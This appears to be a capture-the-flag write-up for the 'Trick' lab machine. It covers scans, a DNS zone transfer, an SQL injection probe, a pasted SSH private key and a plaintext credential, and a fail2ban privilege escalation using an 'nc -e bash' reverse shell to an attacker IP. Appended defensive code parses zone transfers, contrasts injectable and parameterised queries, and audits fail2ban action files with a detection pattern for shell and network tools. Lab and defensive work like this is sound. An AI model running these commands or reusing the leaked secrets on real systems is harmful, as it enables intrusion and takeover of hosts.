# Trick

# IP

> **10.10.11.166**

# Users

> Enemigosss : SuperGucciRainbowCake

# Nmap

```
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-18 20:46 CEST
Stats: 0:00:51 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 93.75% done; ETC: 20:47 (0:00:01 remaining)
Nmap scan report for trick.htb (10.10.11.166)
Host is up (0.056s latency).
Not shown: 996 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-server-header: nginx/1.14.2
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=8/18%OT=22%CT=1%CU=43765%PV=Y%DS=2%DC=T%G=Y%TM=62FE895
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10A%TI=Z%CI=Z%TS=A)SEQ(SP=1
OS:08%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M537ST11NW7%O2=M537ST11NW7%O
OS:3=M537NNT11NW7%O4=M537ST11NW7%O5=M537ST11NW7%O6=M537ST11)WIN(W1=FE88%W2=
OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M537NNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Host: debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   111.80 ms 10.10.16.1
2   29.55 ms  trick.htb (10.10.11.166)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.64 seconds
```

# Gobuster

```
/assets (Status: 301) [Size: 185] [--> http://trick.htb/assets/]
/css    (Status: 301) [Size: 185] [--> http://trick.htb/css/]
/js     (Status: 301) [Size: 185] [--> http://trick.htb/js/]
```

URL: http://preprod-payroll.trick.htb

```
/ajax.php       (Status: 200) [Size: 0]
/assets         (Status: 301) [Size: 185] [--> http://preprod-payroll.trick.htb/assets/]
/database       (Status: 301) [Size: 185] [--> http://preprod-payroll.trick.htb/database/]
/db_connect.php (Status: 200) [Size: 0]
/employee.php   (Status: 200) [Size: 23094]
/header.php     (Status: 200) [Size: 2548]
/home.php       (Status: 200) [Size: 486]
/index.php      (Status: 302) [Size: 9546] [--> login.php]
/login.php      (Status: 200) [Size: 5571]
/users.php      (Status: 200) [Size: 2197]
```

# Dig

```
└─$ dig trick.htb axfr @10.10.11.166

; <<>> DiG 9.18.1-1-Debian <<>> trick.htb axfr @10.10.11.166
;; global options: +cmd
trick.htb.                 604800 IN SOA   trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.                 604800 IN NS    trick.htb.
trick.htb.                 604800 IN A     127.0.0.1
trick.htb.                 604800 IN AAAA  ::1
preprod-payroll.trick.htb. 604800 IN CNAME trick.htb.
trick.htb.                 604800 IN SOA   trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 191 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Thu Aug 18 21:32:34 CEST 2022
;; XFR size: 6 records (messages 1, bytes 231)
```

Result: preprod-payroll.trick.htb

# SQLI

preprod-payroll.trick.htb (`' OR 1 = 1`)

URL: `http://preprod-payroll.trick.htb/print_payroll.php?id=1`

back-end DBMS: MySQL >= 5.0.12

# VHOST

> preprod-payroll.trick.htb
>
> preprod-marketing.trick.htb

# SSH

```
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz
c4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G
YQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+
4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/
Ukn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4
1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC
DkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0
+93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE
hkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L
jnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6
IqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C
aUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/
KwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC
tnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge
U+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0
fHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V
PH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS
3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA
fvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT
AuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn
In16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP
JkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN
jsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
```

# Privilege Escalation

> mv iptables-multiport.conf iptables-multiport.conf.bak && cp iptables-multiport.conf.bak iptables-multiport.conf && chmod 666 iptables-multiport.conf && nano iptables-multiport.conf
>
> /usr/bin/nc -e /usr/bin/bash 10.10.16.47 1234
>
> sudo /etc/init.d/fail2ban restart
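The zone transfer in the Dig section is what a defender checks for on their own name servers: if `dig <zone> axfr` succeeds against a server, every name in the zone is handed out to anyone who asks. The parser below is an added example, not part of the original notes; it reads `dig axfr` output (the constructed sample reproduces the records shown above), drops the closing SOA, and lists the names the transfer disclosed beyond the zone apex, which here is the `preprod-payroll` host the author found.

```python
"""Parse `dig <zone> axfr` output and list the names a zone transfer discloses.

Added example (not part of the original notes). SAMPLE_AXFR is a constructed
copy of the transfer shown in the Dig section of the page.
"""
import re
from collections import namedtuple

Record = namedtuple("Record", "name ttl rclass rtype rdata")

# Constructed sample: the zone transfer from the Dig section, as dig prints it.
SAMPLE_AXFR = """\
; <<>> DiG 9.18.1-1-Debian <<>> trick.htb axfr @10.10.11.166
;; global options: +cmd
trick.htb.\t\t\t604800\tIN\tSOA\ttrick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.\t\t\t604800\tIN\tNS\ttrick.htb.
trick.htb.\t\t\t604800\tIN\tA\t127.0.0.1
trick.htb.\t\t\t604800\tIN\tAAAA\t::1
preprod-payroll.trick.htb.\t604800\tIN\tCNAME\ttrick.htb.
trick.htb.\t\t\t604800\tIN\tSOA\ttrick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 191 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Thu Aug 18 21:32:34 CEST 2022
;; XFR size: 6 records (messages 1, bytes 231)
"""

# owner-name  TTL  class  type  rdata
_RR = re.compile(r"^(\S+)\s+(\d+)\s+(IN|CH|HS)\s+([A-Z0-9]+)\s+(.*)$")


def parse_axfr(text):
    """Return the resource records in dig axfr output, skipping comment lines
    and the repeated SOA that terminates a successful transfer."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = _RR.match(line)
        if not m:
            continue
        name, ttl, rclass, rtype, rdata = m.groups()
        rec = Record(name.rstrip(".").lower(), int(ttl), rclass, rtype, rdata.strip())
        # An AXFR both opens and closes with the zone's SOA; keep it once.
        if rec.rtype == "SOA" and records and records[0] == rec:
            continue
        records.append(rec)
    return records


def disclosed_names(records, zone):
    """Owner names other than the zone apex that the transfer revealed."""
    zone = zone.rstrip(".").lower()
    return sorted({r.name for r in records if r.name != zone})


def transfer_succeeded(text):
    """dig reports '; Transfer failed.' when AXFR is refused and an XFR size
    line when the server handed the zone over."""
    return "; Transfer failed." not in text and ";; XFR size:" in text


if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    for r in recs:
        print(r)
    print("transfer allowed:", transfer_succeeded(SAMPLE_AXFR))
    print("disclosed names:", disclosed_names(recs, "trick.htb"))
```

Run it over the saved output of `dig yourzone axfr @your-ns`; any name in the disclosed list is one the server will give to an unauthenticated client. On BIND the fix is an `allow-transfer` statement in named.conf that limits transfers to the secondary servers' addresses (or `none`).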
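The SQLI section records that `print_payroll.php?id=1` responds to an `OR 1 = 1` probe, which means the `id` parameter is pasted into the query text. The following is an added example, not the application's code or the author's: a SQLite stand-in for the MySQL backend with a constructed payroll table, showing the interpolated lookup next to the hardened one (integer validation plus a bound parameter) so the difference in behaviour on the same input is visible.

```python
"""Vulnerable vs. parameterised lookup for a `print_payroll.php?id=` style endpoint.

Added example (not the page's or the application's code). SQLite stands in for
the MySQL backend; the payroll rows are constructed sample data.
"""
import sqlite3


def make_db():
    """Constructed sample data: three payroll rows in an in-memory database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE payroll (id INTEGER PRIMARY KEY, employee TEXT, net_pay REAL)")
    con.executemany(
        "INSERT INTO payroll VALUES (?, ?, ?)",
        [(1, "alice", 3100.0), (2, "bob", 2950.0), (3, "carol", 4020.0)],
    )
    return con


def fetch_payroll_vulnerable(con, user_id):
    """Builds the statement by string formatting: whatever the client sent is
    parsed as SQL, so a boolean tacked onto the id widens the WHERE clause."""
    query = f"SELECT id, employee, net_pay FROM payroll WHERE id = {user_id}"
    return con.execute(query).fetchall()


def fetch_payroll_safe(con, user_id):
    """Validates the id as an integer and binds it as a parameter: the input is
    only ever compared as a value and can never change the statement."""
    try:
        id_value = int(user_id)
    except (TypeError, ValueError):
        return []  # reject non-numeric ids instead of handing them to the DB
    query = "SELECT id, employee, net_pay FROM payroll WHERE id = ?"
    return con.execute(query, (id_value,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "1 OR 1 = 1"   # the probe from the notes, for an unquoted numeric id
    print("normal request  :", fetch_payroll_safe(db, "1"))
    print("vulnerable query:", fetch_payroll_vulnerable(db, probe))  # every row
    print("hardened query  :", fetch_payroll_safe(db, probe))        # rejected
```

In PHP the equivalent hardening is a prepared statement (`mysqli` or PDO with a bound `?` parameter) after casting or validating `$_GET['id']` as an integer; string escaping alone does not help when the value sits outside quotes, as the probe above relies on.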
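The privilege escalation above rests on two weaknesses: an action file under fail2ban's action.d that an unprivileged user can rewrite, and sudo rights to restart the service, which then executes the rewritten `actionstart` command as root. The audit script below is an added example (not from the page or the fail2ban project): it reports action files writable by group or others or not owned by root, and action commands that invoke a shell or network client. The demo builds a constructed action.d in a temporary directory with one clean file and one tampered the way the notes describe; pass `/etc/fail2ban/action.d` as the argument to run it against a real host.

```python
"""Audit fail2ban action files for a writable file or a hijacked action command.

Added example, not from the page or from fail2ban. The two action files below
are constructed stand-ins: CLEAN_ACTION resembles a stock iptables action,
TAMPERED_ACTION mirrors the edit described in the Privilege Escalation notes.
"""
import os
import re
import stat
import sys
import tempfile

CLEAN_ACTION = """\
[Definition]
actionstart = <iptables> -N f2b-<name>
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
"""
TAMPERED_ACTION = """\
[Definition]
actionstart = /usr/bin/nc -e /usr/bin/bash 10.10.16.47 1234
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
"""

# Keys whose values fail2ban runs as root, and a heuristic for shells / network
# clients appearing in them (stock iptables actions call <iptables> only).
ACTION_KEYS = ("actionstart", "actionstop", "actioncheck", "actionban", "actionunban", "actionflush")
SUSPICIOUS = re.compile(r"(?:^|[\s/])(?:nc|ncat|netcat|bash|sh|python\d?|perl|curl|wget)\b|/dev/tcp/")


def check_permissions(path):
    """Flag files writable by group or others, or not owned by root (uid 0)."""
    st = os.stat(path)
    findings = []
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: writable by non-owner (mode {stat.filemode(st.st_mode)})")
    if st.st_uid != 0:
        findings.append(f"{path}: owned by uid {st.st_uid}, not root")
    return findings


def check_commands(path):
    """Flag action commands that invoke a shell or a network client."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            key = line.split("=", 1)[0].strip().lower()
            if key in ACTION_KEYS and SUSPICIOUS.search(line):
                findings.append(f"{path}:{lineno}: suspicious action command: {line.strip()}")
    return findings


def audit_action_dir(directory, require_root_owner=True):
    """Return all findings for the .conf files in an action.d directory."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if not name.endswith(".conf"):
            continue
        path = os.path.join(directory, name)
        perms = check_permissions(path)
        if not require_root_owner:
            perms = [f for f in perms if "not root" not in f]
        findings.extend(perms)
        findings.extend(check_commands(path))
    return findings


def demo():
    """Audit a constructed action.d (ownership check skipped because the temp
    files belong to the current user, not root)."""
    with tempfile.TemporaryDirectory() as d:
        clean = os.path.join(d, "iptables-allports.conf")
        tampered = os.path.join(d, "iptables-multiport.conf")
        with open(clean, "w") as fh:
            fh.write(CLEAN_ACTION)
        with open(tampered, "w") as fh:
            fh.write(TAMPERED_ACTION)
        os.chmod(clean, 0o644)
        os.chmod(tampered, 0o666)   # the chmod 666 from the notes
        return audit_action_dir(d, require_root_owner=False)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    results = audit_action_dir(target) if target else demo()
    print("\n".join(results) or "no findings")
```

The permission check is the one that matters most: with action.d files at mode 644 and owned by root, the sudo rule that allows restarting fail2ban only restarts the stock configuration. The command heuristic is a second line of detection for a file that was already altered, and a file-integrity monitor on /etc/fail2ban would catch the same change.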